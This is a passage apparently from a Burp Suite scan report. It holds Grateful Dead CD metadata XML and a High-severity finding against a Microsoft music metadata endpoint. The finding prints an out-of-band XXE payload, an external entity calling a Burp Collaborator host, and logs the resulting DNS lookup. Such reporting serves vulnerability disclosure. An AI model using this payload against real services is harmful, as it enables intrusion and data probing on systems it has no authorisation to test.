<trackDuration>505010</trackDuration>
<bitrate>277032</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>9</trackRequestID>
</track>
<track>
<title>
<text>That Would Be Something</text>
<word>That</word>
<word>Would</word>
<word>Be</word>
<word>Something</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>3-01 That Would Be Something.m4a</filename>
<trackDuration>231526</trackDuration>
<bitrate>267560</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>16</trackRequestID>
</track>
<track>
<title>
<text>Slipknot!</text>
<word>Slipknot</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>1-02 Slipknot!.m4a</filename>
<trackDuration>330466</trackDuration>
<bitrate>277496</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>1</trackRequestID>
</track>
<track>
<title>
<text>Crazy Fingers</text>
<word>Crazy</word>
<word>Fingers</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>2-02 Crazy Fingers.m4a</filename>
<trackDuration>578919</trackDuration>
<bitrate>270592</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>10</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>3-02 Playing In the Band.m4a</filename>
<trackDuration>323616</trackDuration>
<bitrate>283784</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>17</trackRequestID>
</track>
<track>
<title>
<text>Franklin's Tower</text>
<word>Franklins</word>
<word>Tower</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>1-03 Franklin's Tower.m4a</filename>
<trackDuration>641660</trackDuration>
<bitrate>277072</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>2</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>2-03 Playing In the Band.m4a</filename>
<trackDuration>562642</trackDuration>
<bitrate>281312</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>11</trackRequestID>
</track>
<track>
<title>
<text>China Doll</text>
<word>China</word>
<word>Doll</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>3-03 China Doll.m4a</filename>
<trackDuration>347022</trackDuration>
<bitrate>264424</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>18</trackRequestID>
</track>
<track>
<title>
<text>Walkin' Blues</text>
<word>Walkin</word>
<word>Blues</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>1-04 Walkin' Blues.m4a</filename>
<trackDuration>390884</trackDuration>
<bitrate>274608</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>3</trackRequestID>
</track>
<track>
<title>
<text>Terrapin Station</text>
<word>Terrapin</word>
<word>Station</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>2-04 Terrapin Station.m4a</filename>
<trackDuration>767930</trackDuration>
<bitrate>271168</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>12</trackRequestID>
</track>
<track>
<title>
<text>Throwing Stones</text>
<word>Throwing</word>
<word>Stones</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>3-04 Throwing Stones.m4a</filename>
<trackDuration>539469</trackDuration>
<bitrate>276512</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>19</trackRequestID>
</track>
<track>
<title>
<text>It Must Have Been the Roses</text>
<word>It</word>
<word>Must</word>
<word>Have</word>
<word>Been</word>
<word>the</word>
<word>Roses</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>1-05 It Must Have Been the Roses.m4a</filename>
<trackDuration>345977</trackDuration>
<bitrate>263432</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>4</trackRequestID>
</track>
<track>
<title>
<text>Boston Clam Jam</text>
<word>Boston</word>
<word>Clam</word>
<word>Jam</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>2-05 Boston Clam Jam.m4a</filename>
<trackDuration>337409</trackDuration>
<bitrate>274216</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>13</trackRequestID>
</track>
<track>
<title>
<text>Not Fade Away</text>
<word>Not</word>
<word>Fade</word>
<word>Away</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>3-05 Not Fade Away.m4a</filename>
<trackDuration>541791</trackDuration>
<bitrate>262816</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>20</trackRequestID>
</track>
<track>
<title>
<text>Dire Wolf</text>
<word>Dire</word>
<word>Wolf</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>1-06 Dire Wolf.m4a</filename>
<trackDuration>239653</trackDuration>
<bitrate>263096</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>5</trackRequestID>
</track>
<track>
<title>
<text>Drums</text>
<word>Drums</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>2-06 Drums.m4a</filename>
<trackDuration>664764</trackDuration>
<bitrate>265960</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>14</trackRequestID>
</track>
<track>
<title>
<text>The Mighty Quinn</text>
<word>The</word>
<word>Mighty</word>
<word>Quinn</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>3-06 The Mighty Quinn.m4a</filename>
<trackDuration>281054</trackDuration>
<bitrate>263256</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>21</trackRequestID>
</track>
<track>
<title>
<text>Queen Jane Approximately</text>
<word>Queen</word>
<word>Jane</word>
<word>Approximately</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>1-07 Queen Jane Approximately.m4a</filename>
<trackDuration>436883</trackDuration>
<bitrate>269672</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>6</trackRequestID>
</track>
<track>
<title>
<text>Space</text>
<word>Space</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>2-07 Space.m4a</filename>
<trackDuration>495537</trackDuration>
<bitrate>261064</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>15</trackRequestID>
</track>
<track>
<title>
<text>Samson and Delilah</text>
<word>Samson</word>
<word>and</word>
<word>Delilah</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>3-07 Samson and Delilah.m4a</filename>
<trackDuration>467348</trackDuration>
<bitrate>279320</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>22</trackRequestID>
</track>
<track>
<title>
<text>Tennessee Jed</text>
<word>Tennessee</word>
<word>Jed</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>1-08 Tennessee Jed.m4a</filename>
<trackDuration>470366</trackDuration>
<bitrate>268080</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>7</trackRequestID>
</track>
<track>
<title>
<text>Eyes of the World</text>
<word>Eyes</word>
<word>of</word>
<word>the</word>
<word>World</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>3-08 Eyes of the World.m4a</filename>
<trackDuration>1410078</trackDuration>
<bitrate>276416</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>23</trackRequestID>
</track>
<track>
<title>
<text>The Music Never Stopped</text>
<word>The</word>
<word>Music</word>
<word>Never</word>
<word>Stopped</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>9</trackNumber>
<filename>1-09 The Music Never Stopped.m4a</filename>
<trackDuration>498718</trackDuration>
<bitrate>273520</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>8</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Collaborator DNS interaction

The Collaborator server received a DNS lookup of type A for the domain name svruvlsxgjgu9zr7qjxceap7zy5pvdt1ks7iv7.burpcollaborator.net.

The lookup was received from IP address 65.55.5.154 at 2017-Sep-03 23:38:01 UTC.

2.4. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [request body]
Previous Next

Summary

	Severity:	High
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Issue detail

It is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. The tag <!DOCTYPE metadata [<!ENTITY % f6vl5 SYSTEM "http://0ef2etb5zrz2s7af9rgkxi8fi6oxeld940rqff.burpcollaborator.net">%f6vl5; ]><METADATA>[0x0d][0x0a] <MDQ-CD>[0x0d][0x0a] <mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC</mdqRequestID>[0x0d][0x0a] <album>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Dick's Picks, Vol. 17: Boston Garden, Boston, MA 9/25/91</text>[0x0d][0x0a] <word>Dicks</word>[0x0d][0x0a] <word>Picks</word>[0x0d][0x0a] <word>Vol</word>[0x0d][0x0a] <word>17</word>[0x0d][0x0a] <word>Boston</word>[0x0d][0x0a] <word>Garden</word>[0x0d][0x0a] <word>Boston</word>[0x0d][0x0a] <word>MA</word>[0x0d][0x0a] <word>9</word>[0x0d][0x0a] <word>25</word>[0x0d][0x0a] <word>91</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] </album>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Help On the Way</text>[0x0d][0x0a] <word>Help</word>[0x0d][0x0a] <word>On</word>[0x0d][0x0a] <word>the</word>[0x0d][0x0a] <word>Way</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>1</trackNumber>[0x0d][0x0a] <filename>1-01 Help On the Way.m4a</filename>[0x0d][0x0a] <trackDuration>255326</trackDuration>[0x0d][0x0a] <bitrate>302064</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>0</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Victim or the Crime</text>[0x0d][0x0a] <word>Victim</word>[0x0d][0x0a] <word>or</word>[0x0d][0x0a] <word>the</word>[0x0d][0x0a] <word>Crime</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>1</trackNumber>[0x0d][0x0a] <filename>2-01 Victim or the Crime.m4a</filename>[0x0d][0x0a] <trackDuration>505010</trackDuration>[0x0d][0x0a] <bitrate>277032</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>9</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>That Would Be Something</text>[0x0d][0x0a] <word>That</word>[0x0d][0x0a] <word>Would</word>[0x0d][0x0a] <word>Be</word>[0x0d][0x0a] <word>Something</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>1</trackNumber>[0x0d][0x0a] <filename>3-01 That Would Be Something.m4a</filename>[0x0d][0x0a] <trackDuration>231526</trackDuration>[0x0d][0x0a] <bitrate>267560</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>16</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Slipknot!</text>[0x0d][0x0a] <word>Slipknot</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>2</trackNumber>[0x0d][0x0a] <filename>1-02 Slipknot!.m4a</filename>[0x0d][0x0a] <trackDuration>330466</trackDuration>[0x0d][0x0a] <bitrate>277496</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>1</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Crazy Fingers</text>[0x0d][0x0a] <word>Crazy</word>[0x0d][0x0a] <word>Fingers</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>2</trackNumber>[0x0d][0x0a] <filename>2-02 Crazy Fingers.m4a</filename>[0x0d][0x0a] <trackDuration>578919</trackDuration>[0x0d][0x0a] <bitrate>270592</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>10</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Playing In the Band</text>[0x0d][0x0a] <word>Playing</word>[0x0d][0x0a] <word>In</word>[0x0d][0x0a] <word>the</word>[0x0d][0x0a] <word>Band</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>2</trackNumber>[0x0d][0x0a] <filename>3-02 Playing In the Band.m4a</filename>[0x0d][0x0a] <trackDuration>323616</trackDuration>[0x0d][0x0a] <bitrate>283784</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>17</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Franklin's Tower</text>[0x0d][0x0a] <word>Franklins</word>[0x0d][0x0a] <word>Tower</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>3</trackNumber>[0x0d][0x0a] <filename>1-03 Franklin's Tower.m4a</filename>[0x0d][0x0a] <trackDuration>641660</trackDuration>[0x0d][0x0a] <bitrate>277072</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>2</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Playing In the Band</text>[0x0d][0x0a] <word>Playing</word>[0x0d][0x0a] <word>In</word>[0x0d][0x0a] <word>the</word>[0x0d][0x0a] <word>Band</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>3</trackNumber>[0x0d][0x0a] <filename>2-03 Playing In the Band.m4a</filename>[0x0d][0x0a] <trackDuration>562642</trackDuration>[0x0d][0x0a] <bitrate>281312</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>11</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>China Doll</text>[0x0d][0x0a] <word>China</word>[0x0d][0x0a] <word>Doll</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>3</trackNumber>[0x0d][0x0a] <filename>3-03 China Doll.m4a</filename>[0x0d][0x0a] <trackDuration>347022</trackDuration>[0x0d][0x0a] <bitrate>264424</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>18</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Walkin' Blues</text>[0x0d][0x0a] <word>Walkin</word>[0x0d][0x0a] <word>Blues</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>4</trackNumber>[0x0d][0x0a] <filename>1-04 Walkin' Blues.m4a</filename>[0x0d][0x0a] <trackDuration>390884</trackDuration>[0x0d][0x0a] <bitrate>274608</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>3</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Terrapin Station</text>[0x0d][0x0a] <word>Terrapin</word>[0x0d][0x0a] <word>Station</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>4</trackNumber>[0x0d][0x0a] <filename>2-04 Terrapin Station.m4a</filename>[0x0d][0x0a] <trackDuration>767930</trackDuration>[0x0d][0x0a] <bitrate>271168</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>12</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Throwing Stones</text>[0x0d][0x0a] <word>Throwing</word>[0x0d][0x0a] <word>Stones</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>4</trackNumber>[0x0d][0x0a] <filename>3-04 Throwing Stones.m4a</filename>[0x0d][0x0a] <trackDuration>539469</trackDuration>[0x0d][0x0a] <bitrate>276512</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>19</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>It Must Have Been the Roses</text>[0x0d][0x0a] <word>It</word>[0x0d][0x0a] <word>Must</word>[0x0d][0x0a] <word>Have</word>[0x0d][0x0a] <word>Been</word>[0x0d][0x0a] <word>the</word>[0x0d][0x0a] <word>Roses</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>5</trackNumber>[0x0d][0x0a] <filename>1-05 It Must Have Been the Roses.m4a</filename>[0x0d][0x0a] <trackDuration>345977</trackDuration>[0x0d][0x0a] <bitrate>263432</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>4</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Boston Clam Jam</text>[0x0d][0x0a] <word>Boston</word>[0x0d][0x0a] <word>Clam</word>[0x0d][0x0a] <word>Jam</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>5</trackNumber>[0x0d][0x0a] <filename>2-05 Boston Clam Jam.m4a</filename>[0x0d][0x0a] <trackDuration>337409</trackDuration>[0x0d][0x0a] <bitrate>274216</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>13</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Not Fade Away</text>[0x0d][0x0a] <word>Not</word>[0x0d][0x0a] <word>Fade</word>[0x0d][0x0a] <word>Away</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>5</trackNumber>[0x0d][0x0a] <filename>3-05 Not Fade Away.m4a</filename>[0x0d][0x0a] <trackDuration>541791</trackDuration>[0x0d][0x0a] <bitrate>262816</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>20</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Dire Wolf</text>[0x0d][0x0a] <word>Dire</word>[0x0d][0x0a] <word>Wolf</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>6</trackNumber>[0x0d][0x0a] <filename>1-06 Dire Wolf.m4a</filename>[0x0d][0x0a] <trackDuration>239653</trackDuration>[0x0d][0x0a] <bitrate>263096</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>5</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Drums</text>[0x0d][0x0a] <word>Drums</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>6</trackNumber>[0x0d][0x0a] <filename>2-06 Drums.m4a</filename>[0x0d][0x0a] <trackDuration>664764</trackDuration>[0x0d][0x0a] <bitrate>265960</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>14</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>The Mighty Quinn</text>[0x0d][0x0a] <word>The</word>[0x0d][0x0a] <word>Mighty</word>[0x0d][0x0a] <word>Quinn</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>6</trackNumber>[0x0d][0x0a] <filename>3-06 The Mighty Quinn.m4a</filename>[0x0d][0x0a] <trackDuration>281054</trackDuration>[0x0d][0x0a] <bitrate>263256</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>21</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Queen Jane Approximately</text>[0x0d][0x0a] <word>Queen</word>[0x0d][0x0a] <word>Jane</word>[0x0d][0x0a] <word>Approximately</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>7</trackNumber>[0x0d][0x0a] <filename>1-07 Queen Jane Approximately.m4a</filename>[0x0d][0x0a] <trackDuration>436883</trackDuration>[0x0d][0x0a] <bitrate>269672</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>6</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Space</text>[0x0d][0x0a] <word>Space</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>7</trackNumber>[0x0d][0x0a] <filename>2-07 Space.m4a</filename>[0x0d][0x0a] <trackDuration>495537</trackDuration>[0x0d][0x0a] <bitrate>261064</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>15</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Samson and Delilah</text>[0x0d][0x0a] <word>Samson</word>[0x0d][0x0a] <word>and</word>[0x0d][0x0a] <word>Delilah</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>7</trackNumber>[0x0d][0x0a] <filename>3-07 Samson and Delilah.m4a</filename>[0x0d][0x0a] <trackDuration>467348</trackDuration>[0x0d][0x0a] <bitrate>279320</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>22</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Tennessee Jed</text>[0x0d][0x0a] <word>Tennessee</word>[0x0d][0x0a] <word>Jed</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>8</trackNumber>[0x0d][0x0a] <filename>1-08 Tennessee Jed.m4a</filename>[0x0d][0x0a] <trackDuration>470366</trackDuration>[0x0d][0x0a] <bitrate>268080</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>7</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>Eyes of the World</text>[0x0d][0x0a] <word>Eyes</word>[0x0d][0x0a] <word>of</word>[0x0d][0x0a] <word>the</word>[0x0d][0x0a] <word>World</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>8</trackNumber>[0x0d][0x0a] <filename>3-08 Eyes of the World.m4a</filename>[0x0d][0x0a] <trackDuration>1410078</trackDuration>[0x0d][0x0a] <bitrate>276416</bitrate>[0x0d][0x0a] <drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>23</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] <track>[0x0d][0x0a] <title>[0x0d][0x0a] <text>The Music Never Stopped</text>[0x0d][0x0a] <word>The</word>[0x0d][0x0a] <word>Music</word>[0x0d][0x0a] <word>Never</word>[0x0d][0x0a] <word>Stopped</word>[0x0d][0x0a] </title>[0x0d][0x0a] <artist>[0x0d][0x0a] <text>Grateful Dead</text>[0x0d][0x0a] <word>Grateful</word>[0x0d][0x0a] <word>Dead</word>[0x0d][0x0a] </artist>[0x0d][0x0a] <trackNumber>9</trackNumber>[0x0d][0x0a] <filename>1-09 The Music Never Stopped.m4a</filename>[0x0d][0x0a] <trackDuration>498718</trackDuration>[0x0d][0x0a] <bitrate>273520</bitrate>[0x0d][0x0a] 